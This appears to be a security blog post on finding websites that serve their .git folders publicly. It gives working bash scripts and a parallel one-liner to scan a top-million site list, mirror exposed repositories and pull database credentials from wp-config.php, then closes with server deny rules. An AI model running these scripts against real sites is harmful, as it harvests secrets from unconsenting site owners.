The Git version control system stores all of its data about current and past revisions of files in a hidden folder called .git. By convention, secrets such as passwords are not committed to Git; they belong in environment variables or other configuration mechanisms. However, thanks to poor programming practices and the general laziness of developers, it is common to find sensitive information committed anyway, even on major software platforms.
Most sane web servers block access to hidden directories and files; Apache, for example, typically refuses to serve .htaccess files. It seems, however, that many servers do not deny access to .git folders.
When a server allows listing the contents of a directory, a recursive downloader can fetch every file within it. Common Linux utilities such as wget can mirror a website with a single command, so given a list of popular websites, you can check and mirror a large number of them very quickly.
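For instance, mirroring a single exposed folder takes just one command (with example.com standing in for a real host):

wget -r --no-parent http://example.com/.git/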
A short bash script can automate the check: it takes a single list entry (rank and domain), tests whether a .git folder exists, and downloads that directory if possible.
#!/bin/bash
# Takes a single list entry as $1, e.g. "1 example.com" (rank and domain).
IFS=' ' read -r -a array <<< "$1"
echo "[${array[0]}] Checking ${array[1]}"
# Probe .git/HEAD, following redirects and keeping only the HTTP status code.
STATUSCODE=$(curl -L --silent --output /dev/null --write-out "%{http_code}" --max-time 5 "http://${array[1]}/.git/HEAD")
if test "$STATUSCODE" = 200; then
    echo "[${array[0]}] Got 200 on ${array[1]}"
    # Mirror the folder; -r recurses and --no-parent stays inside /.git/.
    wget -r --no-parent --connect-timeout=5 "http://${array[1]}/.git/"
fi
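The script expects its argument as a single "rank domain" pair. Assuming the Alexa list is the usual rank,domain CSV and the script is saved as check.sh (a hypothetical name), one way to run it across the whole list in parallel would be:

tr ',' ' ' < top-1m.csv | xargs -P 20 -I {} ./check.sh "{}"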
I ran this script on the Alexa top million sites. This yielded a surprising number of sites with .git directories.
Many of these hits are false positives: plenty of websites return a 200 status code even for a "page not found" page. Additionally, a downloaded .git folder does not immediately contain the source code; the working tree still has to be restored from the repository data.
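One quick way to weed out such soft 404s is to look at what .git/HEAD actually contains: in a real repository it normally starts with a ref line (a sketch, with example.com as a placeholder; a detached HEAD would hold a bare commit hash instead):

curl -s --max-time 5 http://example.com/.git/HEAD | grep -q '^ref:' && echo "looks like a real repo"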
Cleaning up the results takes only a few commands, and again a short bash script can automate this.
#!/bin/bash
# Delete the directory-listing pages wget saved; stray HTML files confuse Git.
find . -name '*index.html*' -type f -delete
# wget placed each mirrored site in a directory named after its host.
for D in ./*
do
    if test -f "$D/.git/HEAD"
    then
        echo "$D"
        (
            cd "$D" || exit
            # Rebuild the working tree from the downloaded repository data.
            git reset --hard HEAD
            if [ $? -eq 0 ]; then
                cd ..
                # Set restored repositories aside for further analysis.
                mv "$D" ../valid/
            fi
        )
    fi
done
This script removes any HTML files that would interfere with Git, checks whether each .git folder contains a HEAD, restores the source code from the repository data, and finally moves the restored code into a separate folder where I can do further analysis.
I only ran the script against about 30,000 sites, which turned up 6 WordPress installs complete with their wp-config.php files. These configuration files contain the database username and password as well as the authentication keys and salts. The results also include sites not running WordPress, and most of those still expose database connection information.
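A rough way to see what leaked is to grep the restored trees for credential markers; DB_PASSWORD is the constant WordPress uses in wp-config.php, and valid/ is the folder the cleanup script fills (a sketch):

grep -r --include='wp-config.php' 'DB_PASSWORD' valid/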
While I could connect to these servers and export or dump the databases, I would not be able to do so in good conscience (and, of course, I do not wish to commit a crime).
A surprising number of websites have publicly accessible and indexable .git folders. From one of these, an attacker can download a copy of the source code and, more often than not, retrieve confidential information such as database passwords and salts.
Systems administrators absolutely must deny access to hidden files and folders to prevent attacks like this from being carried out against their sites.
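For example, the following sketches (adapt them to your own configuration layout) deny requests for hidden paths:

# nginx: deny requests touching hidden files or directories
location ~ /\. {
    deny all;
}

# Apache 2.4: deny access to any .git directory
<DirectoryMatch "/\.git">
    Require all denied
</DirectoryMatch>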
Note: I do not suggest that running these scripts is a good idea; I did all of this purely for educational reasons. After briefly looking at some of the code obtained, I purged any remaining files from my servers and did not disclose any information about the affected sites.